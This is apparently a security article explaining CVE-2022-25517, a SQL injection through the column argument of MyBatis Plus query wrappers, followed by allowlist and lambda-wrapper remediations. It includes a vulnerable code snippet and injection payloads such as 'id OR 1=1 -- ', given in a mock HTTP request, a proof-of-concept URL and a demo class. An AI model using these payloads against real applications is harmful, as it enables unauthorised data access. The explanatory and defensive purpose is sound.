MyBatis Plus is a popular enhancement of the MyBatis framework, widely used in Java applications for simplifying database operations. In early 2022, researchers reported a critical security issue: CVE-2022-25517, a SQL Injection vulnerability affecting MyBatis Plus version 3.4.3. The issue is in the AbstractWrapper.java file: the column name passed to the wrapper's condition methods is spliced into the SQL text as-is, while only the value is bound as a parameter. In this long-form article, we'll break down the vulnerability in plain English, look at example code, understand how exploitation works, and provide resources for remediation.
What’s the Issue?
CVE-2022-25517 is a SQL Injection bug. It means an attacker can manipulate database queries by injecting SQL code, leading to unauthorized data access or even full database compromise. The vulnerability specifically lies in how AbstractWrapper.java processes the column parameter: a column name is an identifier, not a value, so it cannot be bound as a JDBC parameter, and the wrapper concatenates it into the query text without any sanitization or validation.
Because MyBatis Plus is often used in enterprise applications, this issue can have a broad impact. Exploiting this bug can let attackers access, modify, or even destroy confidential data.
Where’s the Problem Code?
The core of this vulnerability is inside the AbstractWrapper class, which is responsible for constructing conditional queries in MyBatis Plus. Let’s look at an illustrative code snippet that exposes the problem.
Vulnerable Code Example
// In /core/conditions/AbstractWrapper.java (simplified)
@Override
public AbstractWrapper<T, R, Children> eq(R column, Object val) {
// Vulnerable: 'column' is concatenated into the SQL text verbatim.
// Only 'val' is bound as a parameter (the "?"), so parameterization does not protect the column position.
this.sqlSegment += " AND " + column + " = ?";
this.paramList.add(val);
return this;
}
Explanation:
The method receives a column parameter and inserts it directly into the SQL segment used to build the final query. If the column parameter comes from user input and isn't validated, an attacker can pass in SQL instead of a column name. For example, passing the column username OR 1=1 -- produces the condition username OR 1=1 -- = ?, which is always true, and the -- comment hides the trailing = ? from the database.
Result: The query returns all rows from the users table, leaking all user info.
This could be even worse if attackers use more elaborate payloads to exfiltrate data or modify the database, since the injection point sits in the middle of the statement rather than inside a quoted value.
Example of Real-World Exploit
Here’s a mock HTTP request (for a web app using MyBatis Plus) showing how an attacker might send exploit data:
POST /api/getUser
Content-Type: application/json
{
"column": "username OR 1=1 -- ",
"value": "does-not-matter"
}
Even though the endpoint expects a valid column name, the string is concatenated into the SQL as described above. The resulting WHERE clause username OR 1=1 -- = ? is always true, so the query returns every user; at a login endpoint the same trick would bypass the credential check.
More Detailed Proof of Concept (POC)
// Suppose you have this API endpoint in your app
@GetMapping("/users")
public List<User> getUserByColumn(@RequestParam String column, @RequestParam String value) {
QueryWrapper<User> wrapper = new QueryWrapper<>();
wrapper.eq(column, value); // vulnerable usage!
return userService.list(wrapper);
}
An attacker could call (spaces shown unencoded for readability; a real request would URL-encode them as %20)
/users?column=id OR 1=1 -- &value=abc
This would generate and execute (the bound value is shown inline for readability; MyBatis Plus actually binds it as a parameter, which does not help because the injection is in the column position)
SELECT * FROM users WHERE id OR 1=1 -- = 'abc'
Which returns all users regardless of the actual value, because everything after -- is a comment and 1=1 makes the condition true for every row.
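To see the mechanism with the real library rather than the simplified snippet, here is an added example (not code from the article or the MyBatis Plus project) that renders the WHERE segment QueryWrapper produces for a benign and for an injected column name, alongside the parameters that would be bound. It assumes mybatis-plus-core 3.4.x on the classpath; the class and method names are the example's own, and no database is needed because getSqlSegment() only renders text.

```java
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;

import java.util.Map;

// Added example: exercises QueryWrapper offline to show where the column name ends up.
// Assumes mybatis-plus-core 3.4.x on the classpath (constructed example, no DB required).
public class ColumnSegmentDemo {

    // Returns the SQL fragment MyBatis Plus would append for eq(column, value).
    // The column string is concatenated into this text; the value is not.
    static String renderEq(String column, Object value) {
        QueryWrapper<Object> wrapper = new QueryWrapper<>();
        wrapper.eq(column, value);
        return wrapper.getSqlSegment();
    }

    // Returns the parameters MyBatis will bind for the same condition.
    // The value shows up here (safely, as a bound parameter); the column never does.
    static Map<String, Object> renderParams(String column, Object value) {
        QueryWrapper<Object> wrapper = new QueryWrapper<>();
        wrapper.eq(column, value);
        return wrapper.getParamNameValuePairs();
    }

    public static void main(String[] args) {
        // Case 1: injection attempt in the VALUE position. Harmless: it lands in the
        // parameter map and is sent to the database as data, never as SQL text.
        String benignColumn = "id";
        String hostileValue = "abc' OR '1'='1";
        System.out.println("segment: " + renderEq(benignColumn, hostileValue));
        System.out.println("params : " + renderParams(benignColumn, hostileValue));
        System.out.println();

        // Case 2: the article's PoC payload in the COLUMN position. The text is
        // spliced into the segment verbatim, so the generated WHERE is always true.
        String hostileColumn = "id OR 1=1 -- ";
        String benignValue = "abc";
        System.out.println("segment: " + renderEq(hostileColumn, benignValue));
        System.out.println("params : " + renderParams(hostileColumn, benignValue));
    }
}
```

Run it with mybatis-plus-core on the classpath. In the first case the segment contains only the fixed column and a #{ew.paramNameValuePairs.…} placeholder, and the quote-laden value appears solely in the parameter map; in the second case the string id OR 1=1 -- is visible inside the rendered segment itself. The exact placeholder naming is an observation from the 3.4.x series, not a documented format.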
Original References
- NVD CVE Record (CVE-2022-25517)
- github.com/baomidou/mybatis-plus/issues/5416
- Exploit Details on ExploitDB *(example, link may vary)*
Is Exploiting Easy?
Yes. If the application passes a user-controlled string as the column argument of wrapper.eq (or any other condition method that takes a column, such as ne, like, or orderBy), exploitation is trivial: the injection point is in the identifier position, where value parameterization offers no protection. Even low-skilled attackers using automated tools (e.g., sqlmap) can compromise poorly protected apps.
// Safe pattern: validate the column name against an allowlist before it reaches the wrapper
private static final Set<String> ALLOWED_COLUMNS = Set.of("id", "username", "email");

static String checkedColumn(String column) {
if (!ALLOWED_COLUMNS.contains(column)) {
throw new IllegalArgumentException("Invalid column name");
}
return column;
}
Upgrade to a release that addresses this issue (the NVD record lists the affected versions). Regardless of the version you run, never pass user-controlled strings as column names to wrapper methods: column names are spliced into the SQL text, so only an allowlist like the one above (or the lambda-based wrappers, which take method references instead of strings) removes the injection point.
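Here is an added example (not code from the article or the MyBatis Plus project) of the endpoint from the proof of concept rewritten so that the column can never come from request text. The controller, the User entity, the allowlist and the injected IService<User> are assumptions for illustration; it assumes Spring Web and MyBatis Plus 3.4.x with the User mapper registered, which LambdaQueryWrapper needs in order to resolve method references to column names.

```java
import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper;
import com.baomidou.mybatisplus.core.toolkit.support.SFunction;
import com.baomidou.mybatisplus.extension.service.IService;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.server.ResponseStatusException;

import java.util.List;
import java.util.Map;

// Assumed entity for the example; in a real app this is the existing mapped entity
// whose BaseMapper is registered with MyBatis Plus.
class User {
    private Long id;
    private String username;
    private String email;

    public Long getId() { return id; }
    public String getUsername() { return username; }
    public String getEmail() { return email; }
}

// Added example controller (hypothetical class; IService<User> is assumed to be provided
// by the application's service layer).
@RestController
public class SafeUserController {

    // Allowlist of fields the API may filter on. Keys are the names accepted in the
    // request; values are typed method references, which cannot be built from a string,
    // so the identifier MyBatis Plus splices into the SQL is always one of these three.
    private static final Map<String, SFunction<User, ?>> FILTERABLE =
            Map.<String, SFunction<User, ?>>of(
                    "id", User::getId,
                    "username", User::getUsername,
                    "email", User::getEmail);

    private final IService<User> userService;

    public SafeUserController(IService<User> userService) {
        this.userService = userService;
    }

    @GetMapping("/users")
    public List<User> getUserByColumn(@RequestParam String column,
                                      @RequestParam String value) {
        SFunction<User, ?> field = FILTERABLE.get(column);
        if (field == null) {
            // "id OR 1=1 -- " and every other unlisted name is rejected here,
            // before any SQL is built; the client gets a 400 with no query executed.
            throw new ResponseStatusException(HttpStatus.BAD_REQUEST, "Invalid column name");
        }
        LambdaQueryWrapper<User> wrapper = new LambdaQueryWrapper<>();
        wrapper.eq(field, value);   // the value is still bound as a parameter, as before
        return userService.list(wrapper);
    }
}
```

The important design choice is that the request string is used only as a key into a fixed map, never as the column argument itself. Compared with checking the name against a set of strings and then passing it through, the method-reference form also keeps working if a column is renamed in the entity mapping, because MyBatis Plus resolves the real column name from the entity metadata rather than from the literal.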
Conclusion
CVE-2022-25517 is a painful reminder that even frameworks intended to make life easier can introduce security holes. Always carefully validate and never trust user input, especially when building database queries.
Upgrading your dependencies and reviewing your code with security in mind goes a long way in preventing both this and future vulnerabilities.
Further Reading
- OWASP SQL Injection Prevention Cheat Sheet
- MyBatis Plus GitHub
- Mitre CVE Record
Timeline
Published on: 03/22/2022 19:15:00 UTC
Last modified on: 03/28/2022 20:23:00 UTC